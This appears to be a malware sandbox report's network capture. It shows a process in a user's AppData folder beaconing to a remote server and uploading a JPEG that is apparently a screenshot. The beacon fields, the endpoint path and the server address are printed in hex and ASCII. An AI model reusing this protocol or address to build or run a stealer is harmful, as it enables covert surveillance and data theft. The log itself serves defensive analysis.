                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  235192.168.2.35007191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:11.060314894 CEST20863OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:11.270756960 CEST20865INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  236192.168.2.35007391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:11.529885054 CEST20865OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:11.530071974 CEST20866OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:11.530260086 CEST20876OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:11.530435085 CEST20878OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:11.644948959 CEST20882OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:11.645004988 CEST20884OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:54:11.645032883 CEST20887OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:54:11.645349979 CEST20898OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:54:11.645399094 CEST20899OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:54:11.645461082 CEST20904OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:54:11.759553909 CEST20910OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:54:11.936891079 CEST20954INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  237192.168.2.35007291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:11.531405926 CEST20879OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:11.696050882 CEST20905INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  238192.168.2.35007491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:11.930896997 CEST20953OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:12.117649078 CEST20954INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:54:12.133479118 CEST20954OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:12.133560896 CEST20954OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:12.133769035 CEST20964OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:12.133882046 CEST20967OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:12.251609087 CEST20973OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:12.251717091 CEST20991OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:54:12.251842022 CEST20994OUTData Raw: 1b b9 5f ba 43 55 77 d1 2f 13 fe 59 67 e9 54 b1 34 de cc 87 82 ad 1d d1 98 bd 71 4f c5 59 6d 3e e1 3a c2 c3 f0 a6 18 64 1d 50 8f c2 ab da 45 ec c5 ec 66 b7 44 60 66 a4 14 6d 22 94 0c d1 72 94 5a 1d 4a 29 31 4e 02 a6 e5 0a 29 d4 80 52 81 52 cb 48
                                                                  Data Ascii: _CUw/YgT4qOYm>:dPEfD`fm"rZJ)1N)RRHP)S@Z|A?.kA?/O?:{?KIid<#a{xV@X9w* ^o""g_03L#1'$9$5utf-Y4QLQ`y |+,|Av
                                                                  Sep 30, 2021 23:54:12.370254993 CEST20997OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:54:12.370316982 CEST21005OUTData Raw: 21 cc 8b f5 ae 1c 27 f0 5f ab 3e 8e af c6 bd 11 ec fa a7 1a 16 93 ff 00 5c 47 f2 ac 5e f5 b7 ab 71 a3 69 43 fe 98 8f e4 2b 0e b9 70 bf c3 fb ca c7 ff 00 1b ee 17 14 b8 34 99 a5 cd 74 9c 61 4f 14 ca 50 6a 46 89 29 69 a0 d2 f7 a4 5a 14 53 85 37 34
                                                                  Data Ascii: !'_>\G^qiC+p4taOPjF)iZS74H;((R!iT!HRLu0Z&* qR)C5C\T8u)yz5_7uCj-JP;Y0M&MsQQ(7xxt+2JQQo
                                                                  Sep 30, 2021 23:54:12.370492935 CEST21032OUTData Raw: 4d 14 e1 40 98 ea 29 33 4a 29 92 3a 8a 43 45 02 62 d1 45 28 a0 46 c7 87 bf e3 fd bf eb 99 aa 6d f7 db eb 56 f4 0f f8 fe 6f fa e6 6a a3 7d f6 fa 9a c2 3f c5 63 a9 fc 34 25 2d 1d a8 15 b9 ce 2d 3a 9b 4e a4 48 53 a9 05 2d 4b 10 a2 8a 4a 5a 09 0a 28
                                                                  Data Ascii: M@)3J):CEbE(FmVoj}?c4%--:NHS-KJZ(F(bG47(BV>F8I{NgnTK%?,=yKoWDY[[_;>kq{st^*t$gBfKSi4\p4
                                                                  Sep 30, 2021 23:54:12.370532036 CEST21034OUTData Raw: 8e 93 65 22 da ea 43 2b 6f 32 79 a7 36 f2 02 31 e6 16 67 03 07 3d 8a 9e a3 88 2a 09 c9 a3 cb 53 58 38 be 66 ff 00 ad ac 6c a4 95 8f 6b d5 6c cd af 8c 5d fe c5 79 a7 2d c7 8a 2c e4 cd e9 0c 2f c8 76 1b a0 f9 57 6a ae e2 4e 37 e7 72 fc c3 a1 e2 35
                                                                  Data Ascii: e"C+o2y61g=*SX8flkl]y-,/vWjN7r5+/x\jz~s)*x!||q^ZPGAQN6]je[\]:ZLS(P7 =]\[.X(6PybU'>Db(Dh:*=%
                                                                  Sep 30, 2021 23:54:12.580776930 CEST21042INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  239192.168.2.35007591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:12.363023996 CEST20994OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:12.549858093 CEST21041INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  24192.168.2.34978491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:57.015825987 CEST7964OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:52:57.188941956 CEST7978INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:57 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  240192.168.2.35007691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:12.812817097 CEST21043OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:54:13.017765045 CEST21056INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:54:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  241192.168.2.35007791.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:54:12.954550982 CEST21043OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86295
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:54:12.954790115 CEST21043OUTData Raw: 2d 2d 2d 2d 2d 2d 62 64 63 30 64 66 31 37 33 38 64 32 31 61 65 33 34 33 66 35 62 31 32 38 38 31 35 30 33 65 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------bdc0df1738d21ae343f5b12881503e0eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:54:12.955112934 CEST21053OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:54:12.955328941 CEST21056OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:54:13.089080095 CEST21059OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:54:13.089181900 CEST21076OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:54:13.089231014 CEST21082OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:54:13.221869946 CEST21092OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:54:13.221932888 CEST21098OUTData Raw: 2a 9b 69 04 09 3c 20 05 67 42 37 64 ee 63 b4 e4 b1 f5 aa da 46 a5 a4 69 5e 19 d2 f5 66 3a 94 29 67 ae cf 3d a5 b4 7b 25 69 48 86 12 12 49 72 9b 54 f0 09 08 78 27 8a 9f 6c ed 7f eb 57 61 fb 25 7f eb a2 b9 ca ae 8b aa b6 96 75 55 d2 ef 8e 9c 01 26
                                                                  Data Ascii: *i< gB7dcFi^f:)g={%iHIrTx'lWa%uU&[^I'gnSf%aH[V3_n].D%e%p7)Qb:~v'hbe96F<|goN)y+_ok_Gcy4C.Qbb/<#5.
